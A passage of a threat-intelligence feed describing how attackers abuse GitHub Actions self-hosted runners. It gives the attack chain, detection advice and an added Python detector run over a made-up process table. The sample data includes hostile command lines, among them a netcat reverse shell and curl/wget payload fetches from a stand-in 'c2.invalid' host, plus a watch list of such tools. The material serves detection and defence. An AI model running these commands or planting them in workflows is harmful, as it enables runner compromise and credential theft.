threat focuses on the exploitation of GitHub Actions runners by malicious actors. By gaining the ability to modify or trigger workflows in a linked GitHub repository, attackers can execute arbitrary commands on the runner host. The attack leverages the \u003ccode\u003eRunner.Worker\u003c/code\u003e process or shell interpreters launched via runner entrypoint scripts. Successful exploitation can lead to malicious workflow activity, including code execution, reconnaissance, credential harvesting, and network exfiltration. This presents a significant risk, particularly for organizations relying on self-hosted runners, as it allows attackers to potentially compromise the underlying infrastructure and sensitive data. The Elastic detection rule aims to identify such malicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub repository linked to a self-hosted runner.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies an existing workflow or creates a new one to inject malicious commands.\u003c/li\u003e\n\u003cli\u003eThe compromised workflow is triggered, initiating the \u003ccode\u003eRunner.Worker\u003c/code\u003e process on the runner host.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eRunner.Worker\u003c/code\u003e process executes a shell interpreter (e.g., bash, sh, zsh) via an entrypoint script.\u003c/li\u003e\n\u003cli\u003eThe shell interpreter executes malicious commands specified in the compromised workflow, such as downloading a payload using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, establishing a reverse shell connection to an attacker-controlled server using \u003ccode\u003enc\u003c/code\u003e or \u003ccode\u003esocat\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance, credential harvesting, or 
lateral movement within the runner host and connected network.\u003c/li\u003e\n\u003cli\u003eSensitive data is exfiltrated from the compromised runner host to the attacker\u0026rsquo;s infrastructure.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the complete compromise of the self-hosted runner environment. This could result in the theft of sensitive source code, credentials, and other proprietary information. The attack can also be used as a stepping stone for further attacks on the organization\u0026rsquo;s internal network and infrastructure. Affected sectors include software development, DevOps, and any organization using GitHub Actions with self-hosted runners.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eExecution via GitHub Actions Runner\u003c/code\u003e to your SIEM to detect suspicious commands executed by the GitHub Actions Runner.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for commands like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003ebash\u003c/code\u003e, and \u003ccode\u003essh\u003c/code\u003e spawned by \u003ccode\u003eRunner.Worker\u003c/code\u003e or shell interpreters with \u003ccode\u003eentrypoint.sh\u003c/code\u003e in their command line (see Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies for GitHub repositories and workflows to prevent unauthorized modifications.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit GitHub Actions workflows for suspicious or unexpected commands.\u003c/li\u003e\n\u003cli\u003eIsolate self-hosted runners in a segmented network to limit the impact of a 
potential compromise.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to provide detailed process execution information for effective detection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-github-actions-runner-execution/","summary":"Adversaries compromising GitHub Actions workflows can execute arbitrary commands on runner hosts, leading to code execution, reconnaissance, credential harvesting, or network exfiltration.","title":"Execution via GitHub Actions Runner","url":"https://feed.craftedsignal.io/briefs/2024-01-github-actions-runner-execution/"}],"language":"en","title":"CraftedSignal Threat Feed — Execution","version":"https://jsonfeed.org/version/1.1"}
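The GitHub Actions runner detection from the last brief above, as an added example that is not part of this feed or of Elastic's rule code: a process from the brief's command list is flagged when any ancestor is Runner.Worker, or a shell whose command line names entrypoint.sh. Walking the full ancestry rather than only the direct parent is a generalization of the described rule, so a payload two hops down (bash, then sh, then curl) is still attributed to the runner. bash itself is left off the flagged list here because every `run:` step starts one. The process names, PIDs, command lines and hostnames in the sample table are constructed, and the depth limit is an assumption.

```python
"""Added example, not CraftedSignal's or Elastic's rule code: the GitHub
Actions runner detection from the brief above, run over a constructed
process table. A listed command is flagged when any ancestor is
Runner.Worker or a shell running entrypoint.sh. Walking the whole
ancestry is a generalization of the described direct-parent rule.
Process names, pids and command lines are made up; MAX_DEPTH is assumed."""
from typing import Dict, List, Optional

SUSPICIOUS = {"curl", "wget", "nc", "ncat", "socat", "ssh",
              "powershell.exe", "cmd.exe"}
SHELLS = {"bash", "sh", "zsh", "dash"}
MAX_DEPTH = 8  # bound the walk; a reparented orphan ends at ppid 1 anyway


def is_runner_root(proc: Dict) -> bool:
    """Runner.Worker itself, or a shell running the runner entrypoint."""
    if proc["name"] == "Runner.Worker":
        return True
    return proc["name"] in SHELLS and "entrypoint.sh" in proc.get("command_line", "")


def runner_ancestor(proc: Dict, by_pid: Dict[int, Dict]) -> Optional[Dict]:
    """Nearest ancestor that qualifies as a runner root, or None."""
    cur = by_pid.get(proc["ppid"])
    for _ in range(MAX_DEPTH):
        if cur is None:
            return None
        if is_runner_root(cur):
            return cur
        cur = by_pid.get(cur["ppid"])
    return None


def detect(processes: List[Dict]) -> List[Dict]:
    """Flag listed commands whose ancestry leads back to the runner."""
    by_pid = {p["pid"]: p for p in processes}
    alerts = []
    for p in processes:
        if p["name"] in SUSPICIOUS:
            root = runner_ancestor(p, by_pid)
            if root is not None:
                alerts.append({"pid": p["pid"], "name": p["name"],
                               "command_line": p["command_line"],
                               "runner_ancestor": root["name"]})
    return alerts


# Constructed process table (ppid links form the ancestry chain).
SAMPLE_PROCESSES = [
    {"pid": 100, "ppid": 1, "name": "Runner.Listener",
     "command_line": "Runner.Listener run"},
    {"pid": 200, "ppid": 100, "name": "Runner.Worker",
     "command_line": "Runner.Worker spawnclient 1 2"},
    {"pid": 300, "ppid": 200, "name": "bash",
     "command_line": "bash -e /home/runner/_work/_temp/step.sh"},
    {"pid": 400, "ppid": 300, "name": "sh",
     "command_line": "sh -c 'curl -fsSL http://c2.invalid/p -o /tmp/p'"},
    {"pid": 500, "ppid": 400, "name": "curl",
     "command_line": "curl -fsSL http://c2.invalid/p -o /tmp/p"},
    {"pid": 600, "ppid": 300, "name": "nc",
     "command_line": "nc -e /bin/sh c2.invalid 4444"},
    # Unrelated host maintenance: curl with no runner in its ancestry.
    {"pid": 700, "ppid": 1, "name": "curl",
     "command_line": "curl -s https://updates.invalid/check"},
    # Container started through the runner entrypoint script.
    {"pid": 800, "ppid": 1, "name": "sh", "command_line": "sh /entrypoint.sh"},
    {"pid": 900, "ppid": 800, "name": "wget",
     "command_line": "wget -q http://c2.invalid/stage2"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_PROCESSES):
        print(a)
```

Because legitimate workflows also call curl and wget, the alert is a triage signal rather than a verdict: pair it with the repository audit the brief recommends, and whitelist by full command line rather than by process name.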